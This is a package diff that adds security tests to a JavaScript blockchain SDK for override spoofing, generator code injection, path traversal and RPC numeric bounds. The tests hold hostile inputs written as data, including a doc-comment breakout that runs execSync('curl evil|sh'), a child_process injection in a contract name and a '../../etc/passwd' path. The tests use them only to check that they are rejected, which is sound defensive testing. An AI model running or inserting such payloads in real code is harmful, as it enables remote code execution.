quantumcoin 7.0.12 → 7.0.14

package/test/security/contract-overrides.test.js

@@ -0,0 +1,112 @@
+/**
+ * @testCategory security
+ * @blockchainRequired false
+ * @transactional false
+ * @description Contract override spoofing. A caller-supplied `overrides`
+ *              object must never be able to redirect a contract call to a
+ *              different address (`to`) or replace the encoded calldata (`data`).
+ *              Allow-listed fields (value, gasLimit, ...) must still apply.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+const fs = require("node:fs");
+const os = require("node:os");
+const path = require("node:path");
+
+const { Initialize } = require("../../config");
+const qc = require("../../index");
+const { generateFromArtifacts } = require("../../src/generator");
+const { logSuite, logTest } = require("../verbose-logger");
+
+const ABI = [
+  {
+    type: "function",
+    name: "transfer",
+    stateMutability: "nonpayable",
+    inputs: [
+      { name: "to", type: "address" },
+      { name: "amount", type: "uint256" },
+    ],
+    outputs: [{ name: "", type: "bool" }],
+  },
+];
+
+function _mockSigner() {
+  const captured = [];
+  return {
+    captured,
+    signTransaction: async () => "0x",
+    sendTransaction: async (tx) => {
+      captured.push(tx);
+      return { hash: "0x" + "22".repeat(32) };
+    },
+  };
+}
+
+describe("Security: contract override spoofing", () => {
+  logSuite("Security: contract override spoofing");
+
+  it("send() ignores overrides.to/data/from but applies value/gasLimit (negative + positive)", async () => {
+    logTest("send() ignores overrides.to/data/from but applies value/gasLimit", {});
+    await Initialize(null);
+
+    const contractAddr = qc.Wallet.createRandom().address;
+    const recipient = qc.Wallet.createRandom().address;
+    const evil = qc.Wallet.createRandom().address;
+
+    const signer = _mockSigner();
+    const c = new qc.Contract(contractAddr, ABI, signer);
+
+    await c.send("transfer", [recipient, 1n], {
+      to: evil, // must be ignored
+      data: "0xdeadbeef", // must be ignored
+      from: evil, // must be ignored
+      gasLimit: 99999, // must be applied
+      value: 5n, // must be applied
+      attackerKey: "x", // unknown key must be dropped
+    });
+
+    const tx = signer.captured[0];
+    assert.equal(tx.to, c.address, "to must be the contract address, not the attacker's");
+    assert.notEqual(tx.to, evil);
+    assert.notEqual(tx.data, "0xdeadbeef", "data must be the encoded call, not attacker data");
+    assert.ok(typeof tx.data === "string" && tx.data.startsWith("0x"));
+    assert.equal(tx.from, undefined, "from must not be injectable via overrides");
+    assert.equal(tx.gasLimit, 99999, "allow-listed gasLimit must apply");
+    assert.equal(tx.value, 5n, "allow-listed value must apply");
+    assert.ok(!("attackerKey" in tx), "unknown override keys must be dropped");
+  });
+
+  it("populateTransaction.<fn> protects to/data while keeping allow-listed fields", async () => {
+    logTest("populateTransaction.<fn> protects to/data while keeping allow-listed fields", {});
+    await Initialize(null);
+    const contractAddr = qc.Wallet.createRandom().address;
+    const recipient = qc.Wallet.createRandom().address;
+    const evil = qc.Wallet.createRandom().address;
+    const c = new qc.Contract(contractAddr, ABI);
+
+    const tx = await c.populateTransaction.transfer(recipient, 1n, { to: evil, data: "0xbad", gasLimit: 7 });
+    assert.equal(tx.to, c.address);
+    assert.notEqual(tx.data, "0xbad");
+    assert.equal(tx.gasLimit, 7);
+  });
+
+  it("generated factory/contract templates filter overrides (source-level assertion)", () => {
+    logTest("generated factory/contract templates filter overrides", {});
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "qcgen-ov-"));
+    const outDir = path.join(tmp, "out");
+    const abi = [
+      { type: "constructor", stateMutability: "nonpayable", inputs: [] },
+      ...ABI,
+    ];
+    const res = generateFromArtifacts({ outDir, lang: "ts", artifacts: [{ contractName: "Tok", abi, bytecode: "0x6000" }] });
+    const factorySrc = fs.readFileSync(res.contracts[0].factoryFile, "utf8");
+    const contractSrc = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+    // The unsafe spread of raw overrides must be gone.
+    assert.ok(!factorySrc.includes("...(overrides || {})"), "factory must not spread raw overrides");
+    assert.ok(!contractSrc.includes("...(overrides || {})"), "contract must not spread raw overrides");
+    assert.ok(factorySrc.includes("safeOverrides"), "factory must use the override allow-list");
+    assert.ok(contractSrc.includes("safeOverrides"), "contract must use the override allow-list");
+  });
+});

package/test/security/generator-injection.test.js

@@ -0,0 +1,195 @@
+/**
+ * @testCategory security
+ * @blockchainRequired false
+ * @transactional false
+ * @description Code-injection and path-traversal protections in the SDK
+ *              generator. Attacker-controlled contract/function names (and tuple
+ *              names derived from internalType) must never break out of the
+ *              generated source or escape the output directory.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+const fs = require("node:fs");
+const os = require("node:os");
+const path = require("node:path");
+
+const {
+  generate,
+  generateFromArtifacts,
+  generateTransactionalTestJs,
+  assertSafeIdentifier,
+} = require("../../src/generator");
+const { logSuite, logTest } = require("../verbose-logger");
+
+function _tmpOut() {
+  const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "qcgen-inj-"));
+  return path.join(tmp, "out");
+}
+
+describe("Security: generator code-injection & path-traversal", () => {
+  logSuite("Security: generator code-injection & path-traversal");
+
+  it("assertSafeIdentifier rejects breakout strings and reserved words", () => {
+    logTest("assertSafeIdentifier rejects breakout strings and reserved words", {});
+    assert.throws(() => assertSafeIdentifier('Evil"; console.log(1); //', "contract name"));
+    assert.throws(() => assertSafeIdentifier("../../etc/passwd", "contract name"));
+    assert.throws(() => assertSafeIdentifier("with-dash", "contract name"));
+    assert.throws(() => assertSafeIdentifier("__proto__", "contract name"));
+    assert.throws(() => assertSafeIdentifier("class", "contract name"));
+    assert.throws(() => assertSafeIdentifier("", "contract name"));
+    assert.throws(() => assertSafeIdentifier(123, "contract name"));
+    // Positive: valid identifiers are returned unchanged.
+    assert.equal(assertSafeIdentifier("TestToken", "contract name"), "TestToken");
+    assert.equal(assertSafeIdentifier("_balanceOf$2", "fn"), "_balanceOf$2");
+  });
+
+  it("rejects a malicious contractName (negative)", () => {
+    logTest("rejects a malicious contractName (negative)", {});
+    const abi = [{ type: "function", name: "ok", stateMutability: "view", inputs: [], outputs: [] }];
+    assert.throws(
+      () =>
+        generateFromArtifacts({
+          outDir: _tmpOut(),
+          lang: "ts",
+          artifacts: [{ contractName: 'Evil { static x = require("child_process"); } //', abi, bytecode: "0x00" }],
+        }),
+      /Unsafe contract name|reserved word/i,
+    );
+  });
+
+  it("rejects a path-traversal contractName (negative)", () => {
+    logTest("rejects a path-traversal contractName (negative)", {});
+    const abi = [{ type: "function", name: "ok", stateMutability: "view", inputs: [], outputs: [] }];
+    assert.throws(
+      () =>
+        generateFromArtifacts({
+          outDir: _tmpOut(),
+          lang: "ts",
+          artifacts: [{ contractName: "../../evil", abi, bytecode: "0x00" }],
+        }),
+      /Unsafe contract name/i,
+    );
+  });
+
+  it("rejects a malicious ABI function name (negative)", () => {
+    logTest("rejects a malicious ABI function name (negative)", {});
+    const abi = [
+      { type: "function", name: 'foo(){}; const x = 1; bar', stateMutability: "view", inputs: [], outputs: [] },
+    ];
+    assert.throws(
+      () =>
+        generateFromArtifacts({
+          outDir: _tmpOut(),
+          lang: "ts",
+          artifacts: [{ contractName: "Good", abi, bytecode: "0x00" }],
+        }),
+      /Unsafe ABI function name/i,
+    );
+    // Also covered by the transactional-test generator entry point.
+    assert.throws(
+      () => generateTransactionalTestJs({ contractName: "Good", abi, bytecode: "0x00" }),
+      /Unsafe ABI function name/i,
+    );
+  });
+
+  it("sanitizes malicious tuple names derived from internalType (negative-input, safe-output)", () => {
+    logTest("sanitizes malicious tuple names derived from internalType", {});
+    const outDir = _tmpOut();
+    const abi = [
+      {
+        type: "function",
+        name: "getStruct",
+        stateMutability: "view",
+        inputs: [],
+        outputs: [
+          {
+            name: "s",
+            type: "tuple",
+            internalType: 'struct Evil"]; const pwned = 1; //[',
+            components: [{ name: "a", type: "uint256" }],
+          },
+        ],
+      },
+    ];
+    const res = generateFromArtifacts({ outDir, lang: "ts", artifacts: [{ contractName: "Holder", abi, bytecode: "0x00" }] });
+    const contractSrc = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+    // The tuple type name is derived from the attacker-controlled internalType.
+    // It MUST be emitted as a valid, sanitized TS identifier (the raw payload may
+    // only survive inside the escaped ABI JSON string literal, never as code).
+    const typeDecls = [...contractSrc.matchAll(/export type ([^\s=]+)\s*=/g)].map((m) => m[1]);
+    assert.ok(typeDecls.length >= 1, "a struct type should be generated");
+    for (const id of typeDecls) {
+      assert.match(id, /^[A-Za-z_$][A-Za-z0-9_$]*$/, `tuple type identifier must be sanitized: ${id}`);
+    }
+  });
+
+  it("neutralizes a NatSpec doc-comment breakout in contract & function docs (negative)", () => {
+    logTest("neutralizes a NatSpec doc-comment breakout", {});
+    const payload = `Legit text */ require('child_process').execSync('curl evil|sh'); /* keep`;
+    const abi = [{ type: "function", name: "transfer", stateMutability: "nonpayable", inputs: [], outputs: [] }];
+    const docs = { contract: payload, functions: { transfer: payload } };
+
+    for (const lang of ["ts", "js"]) {
+      const res = generateFromArtifacts({
+        outDir: _tmpOut(),
+        lang,
+        artifacts: [{ contractName: "Doc", abi, bytecode: "0x00", docs }],
+      });
+      const src = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+      // The comment terminator must be neutralized so it cannot close the JSDoc
+      // block early; the payload may only survive as inert comment text.
+      assert.ok(!src.includes("*/ require"), `[${lang}] doc breakout must be neutralized`);
+      assert.ok(src.includes("* /"), `[${lang}] escaped terminator should be present`);
+      // Belt-and-suspenders: every '*/' in the file must be a real JSDoc close,
+      // i.e. it is the last non-space token on its line (' */').
+      for (const line of src.split(/\r?\n/g)) {
+        const idx = line.indexOf("*/");
+        if (idx !== -1) {
+          assert.match(line.trimEnd(), /\*\/$/, `unexpected mid-line */ (possible breakout): ${line}`);
+        }
+      }
+    }
+  });
+
+  it("renders a benign NatSpec doc normally (positive)", () => {
+    logTest("renders a benign NatSpec doc normally", {});
+    const abi = [{ type: "function", name: "transfer", stateMutability: "nonpayable", inputs: [], outputs: [] }];
+    const docs = { contract: "Transfers tokens between accounts.", functions: { transfer: "Moves amount to recipient." } };
+    const res = generateFromArtifacts({
+      outDir: _tmpOut(),
+      lang: "ts",
+      artifacts: [{ contractName: "Doc", abi, bytecode: "0x00", docs }],
+    });
+    const src = fs.readFileSync(res.contracts[0].contractFile, "utf8");
+    assert.ok(src.includes("* Transfers tokens between accounts."), "benign contract doc should render");
+    assert.ok(src.includes("* Moves amount to recipient."), "benign function doc should render");
+  });
+
+  it("generates valid output and preserves legitimate identifiers (positive)", () => {
+    logTest("generates valid output and preserves legitimate identifiers (positive)", {});
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "qcgen-ok-"));
+    const abiPath = path.join(tmp, "Test.abi.json");
+    const binPath = path.join(tmp, "Test.bin");
+    const outDir = path.join(tmp, "out");
+    const abi = [
+      {
+        type: "function",
+        name: "balanceOf",
+        stateMutability: "view",
+        inputs: [{ name: "account", type: "address" }],
+        outputs: [{ name: "", type: "uint256" }],
+      },
+    ];
+    fs.writeFileSync(abiPath, JSON.stringify(abi), "utf8");
+    fs.writeFileSync(binPath, "0x6000", "utf8");
+    const res = generate({ abiPath, binPath, outDir, contractName: "TestToken" });
+    const src = fs.readFileSync(res.contractFile, "utf8");
+    assert.ok(src.includes("export class TestToken"));
+    assert.ok(src.includes("async balanceOf"));
+    // All generated files must live inside outDir (no traversal).
+    for (const f of [res.contractFile, res.factoryFile, res.typesFile, res.indexFile]) {
+      assert.ok(path.resolve(f).startsWith(path.resolve(outDir)), `${f} must be inside outDir`);
+    }
+  });
+});

package/test/security/malformed-input.test.js

@@ -3,7 +3,6 @@
  * @blockchainRequired false
  * @transactional false
  * @description Security tests for malformed input, edge cases, and invalid values.
- *              Covers all findings from the consolidated security audit.
  * Run with VERBOSE=1 for test names.
  */
 
@@ -36,8 +35,8 @@ describe("Security: Malformed Input", () => {
   });
 });
 
-describe("Security: C1 - Private key enumeration protection", () => {
-  logSuite("Security: C1 - Private key enumeration protection");
+describe("Security: Private key enumeration protection", () => {
+  logSuite("Security: Private key enumeration protection");
 
   it("JSON.stringify(wallet) must NOT contain privateKey or seed", async () => {
     logTest("JSON.stringify(wallet) must NOT contain privateKey or seed", {});
@@ -79,8 +78,8 @@ describe("Security: C1 - Private key enumeration protection", () => {
   });
 });
 
-describe("Security: C3 - Wallet.connect() preserves state", () => {
-  logSuite("Security: C3 - Wallet.connect() preserves state");
+describe("Security: Wallet.connect() preserves state", () => {
+  logSuite("Security: Wallet.connect() preserves state");
 
   it("connect() preserves seed", async () => {
     logTest("connect() preserves seed", {});
@@ -96,8 +95,8 @@ describe("Security: C3 - Wallet.connect() preserves state", () => {
   });
 });
 
-describe("Security: C4 - KDF string password handling", () => {
-  logSuite("Security: C4 - KDF string password handling");
+describe("Security: KDF string password handling", () => {
+  logSuite("Security: KDF string password handling");
 
   it("pbkdf2 with plain string password does not crash", async () => {
     logTest("pbkdf2 with plain string password does not crash", {});
@@ -121,8 +120,8 @@ describe("Security: C4 - KDF string password handling", () => {
   });
 });
 
-describe("Security: H2 - Numeric precision in signTransaction", () => {
-  logSuite("Security: H2 - Numeric precision in signTransaction");
+describe("Security: Numeric precision in signTransaction", () => {
+  logSuite("Security: Numeric precision in signTransaction");
 
   it("rejects number value above MAX_SAFE_INTEGER", async () => {
     logTest("rejects number value above MAX_SAFE_INTEGER", {});
@@ -157,8 +156,8 @@ describe("Security: H2 - Numeric precision in signTransaction", () => {
   });
 });
 
-describe("Security: M3 - Password strength enforcement", () => {
-  logSuite("Security: M3 - Password strength enforcement");
+describe("Security: Password strength enforcement", () => {
+  logSuite("Security: Password strength enforcement");
 
   it("encryptSync rejects password shorter than 12 characters", async () => {
     logTest("encryptSync rejects password shorter than 12 characters", {});
@@ -177,8 +176,8 @@ describe("Security: M3 - Password strength enforcement", () => {
   });
 });
 
-describe("Security: M4 - Message signing removed", () => {
-  logSuite("Security: M4 - Message signing removed");
+describe("Security: Message signing removed", () => {
+  logSuite("Security: Message signing removed");
 
   it("hashMessage is not exported", () => {
     logTest("hashMessage is not exported", {});
@@ -201,8 +200,8 @@ describe("Security: M4 - Message signing removed", () => {
   });
 });
 
-describe("Security: M6 - Error messages do not leak secrets", () => {
-  logSuite("Security: M6 - Error messages do not leak secrets");
+describe("Security: Error messages do not leak secrets", () => {
+  logSuite("Security: Error messages do not leak secrets");
 
   it("fromKeys error does not contain actual key bytes", async () => {
     logTest("fromKeys error does not contain actual key bytes", {});
@@ -218,8 +217,8 @@ describe("Security: M6 - Error messages do not leak secrets", () => {
   });
 });
 
-describe("Security: M7 - _hexToBigInt handles '0x'", () => {
-  logSuite("Security: M7 - _hexToBigInt handles '0x'");
+describe("Security: _hexToBigInt handles '0x'", () => {
+  logSuite("Security: _hexToBigInt handles '0x'");
 
   it("getBalance does not crash on '0x' response", async () => {
     logTest("getBalance does not crash on '0x' response", {});
@@ -227,8 +226,8 @@ describe("Security: M7 - _hexToBigInt handles '0x'", () => {
   });
 });
 
-describe("Security: L3 - RLP depth limit", () => {
-  logSuite("Security: L3 - RLP depth limit");
+describe("Security: RLP depth limit", () => {
+  logSuite("Security: RLP depth limit");
 
   it("rejects deeply nested RLP (depth > 64)", () => {
     logTest("rejects deeply nested RLP (depth > 64)", {});
@@ -248,8 +247,8 @@ describe("Security: L3 - RLP depth limit", () => {
   });
 });
 
-describe("Security: M2 - Seed phrase with invalid words", () => {
-  logSuite("Security: M2 - Seed phrase with invalid words");
+describe("Security: Seed phrase with invalid words", () => {
+  logSuite("Security: Seed phrase with invalid words");
 
   it("rejects gibberish words of correct count", async () => {
     logTest("rejects gibberish words of correct count", {});
@@ -269,8 +268,8 @@ describe("Security: M2 - Seed phrase with invalid words", () => {
   });
 });
 
-describe("Security: L6 - Keccak-256 test vectors", () => {
-  logSuite("Security: L6 - Keccak-256 test vectors");
+describe("Security: Keccak-256 test vectors", () => {
+  logSuite("Security: Keccak-256 test vectors");
 
   it("keccak256 of empty bytes matches known digest", async () => {
     logTest("keccak256 of empty bytes matches known digest", {});
@@ -293,8 +292,8 @@ describe("Security: L6 - Keccak-256 test vectors", () => {
   });
 });
 
-describe("Security: H5 - BigInt in provider params", () => {
-  logSuite("Security: H5 - BigInt in provider params");
+describe("Security: BigInt in provider params", () => {
+  logSuite("Security: BigInt in provider params");
 
   it("JsonRpcProvider serializes BigInt params without crashing", async (t) => {
     logTest("JsonRpcProvider serializes BigInt params without crashing", {});
@@ -318,8 +317,8 @@ describe("Security: H5 - BigInt in provider params", () => {
   });
 });
 
-describe("Security: H6 - Per-instance RPC IDs", () => {
-  logSuite("Security: H6 - Per-instance RPC IDs");
+describe("Security: Per-instance RPC IDs", () => {
+  logSuite("Security: Per-instance RPC IDs");
 
   it("different provider instances have independent ID counters", () => {
     logTest("different provider instances have independent ID counters", {});

package/test/security/rpc-numeric-bounds.test.js

@@ -0,0 +1,81 @@
+/**
+ * @testCategory security
+ * @blockchainRequired false
+ * @transactional false
+ * @description RPC quantities are untrusted. A value above
+ *              Number.MAX_SAFE_INTEGER must fail loudly instead of being silently
+ *              truncated by Number(BigInt(...)). The decoder keeps returning a
+ *              `number` (no signature change); only out-of-range values throw.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+
+const { Initialize } = require("../../config");
+const qc = require("../../index");
+const { logSuite, logTest } = require("../verbose-logger");
+
+// 2^53 = 9007199254740992 = one past Number.MAX_SAFE_INTEGER.
+const UNSAFE_HEX = "0x20000000000000";
+const TX_HASH = "0x" + "aa".repeat(32);
+
+class NumProvider extends qc.AbstractProvider {
+  constructor(map) {
+    super();
+    this._map = map;
+  }
+  async _perform(method) {
+    return Object.prototype.hasOwnProperty.call(this._map, method) ? this._map[method] : null;
+  }
+}
+
+describe("Security: untrusted RPC quantity bounds", () => {
+  logSuite("Security: untrusted RPC quantity bounds");
+
+  it("getBlockNumber throws for a value above MAX_SAFE_INTEGER (negative)", async () => {
+    logTest("getBlockNumber rejects an out-of-range quantity", {});
+    await Initialize(null);
+    const p = new NumProvider({ eth_blockNumber: UNSAFE_HEX });
+    await assert.rejects(() => p.getBlockNumber(), /safe integer range/i);
+  });
+
+  it("getBlock throws when block.number exceeds MAX_SAFE_INTEGER (negative)", async () => {
+    logTest("getBlock rejects an out-of-range block number", {});
+    await Initialize(null);
+    const p = new NumProvider({
+      eth_getBlockByNumber: { hash: "0x" + "11".repeat(32), number: UNSAFE_HEX, timestamp: "0x1", transactions: [] },
+    });
+    await assert.rejects(() => p.getBlock("latest"), /safe integer range/i);
+  });
+
+  it("getTransactionReceipt throws when a quantity exceeds MAX_SAFE_INTEGER (negative)", async () => {
+    logTest("getTransactionReceipt rejects an out-of-range quantity", {});
+    await Initialize(null);
+    const p = new NumProvider({
+      eth_getTransactionReceipt: { transactionHash: TX_HASH, blockNumber: UNSAFE_HEX, status: "0x1" },
+    });
+    await assert.rejects(() => p.getTransactionReceipt(TX_HASH), /safe integer range/i);
+  });
+
+  it("decodes normal in-range quantities to the correct number (positive)", async () => {
+    logTest("decodes in-range quantities correctly", {});
+    await Initialize(null);
+    const p = new NumProvider({
+      eth_blockNumber: "0x10",
+      eth_getTransactionReceipt: {
+        transactionHash: TX_HASH,
+        blockNumber: "0x5",
+        transactionIndex: "0x0",
+        status: "0x1",
+      },
+    });
+    const bn = await p.getBlockNumber();
+    assert.equal(bn, 16);
+    assert.equal(typeof bn, "number");
+
+    const receipt = await p.getTransactionReceipt(TX_HASH);
+    assert.equal(receipt.blockNumber, 5);
+    assert.equal(typeof receipt.blockNumber, "number");
+    assert.equal(receipt.status, 1);
+  });
+});